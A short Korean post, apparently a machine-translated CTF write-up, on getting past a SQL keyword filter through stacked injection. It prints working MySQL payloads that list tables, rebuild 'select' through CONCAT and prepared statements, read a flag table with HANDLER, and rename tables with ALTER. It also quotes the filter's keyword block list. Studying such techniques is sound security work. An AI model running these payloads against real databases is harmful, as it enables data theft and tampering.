각종 ql 주입 회전 자세

776 단어 sql 주입
1. sql 검색의 키워드를 필터합니다
select|update|delete|drop|insert|where

스택 주입을 사용하여 존재하는 라이브러리, 테이블, 열의 값을 먼저 조회하기-1';show tables;#-1';show columns from tables;#
다음은 표 안의 구체적인 데이터 방법을 조사한다. 첫째, mysql의 예처리-1'을 이용한다.set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#mysql은 대소문자에 민감하지 않습니다
방법2:handler를 이용하기;handler `1919810931114514` open;handler `1919810931114514` read first;#
방법3: 검색할 표를 페이지에서 검색할 표 1로 바꾸기;alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#원문: https://www.cnblogs.com/joker...

좋은 웹페이지 즐겨찾기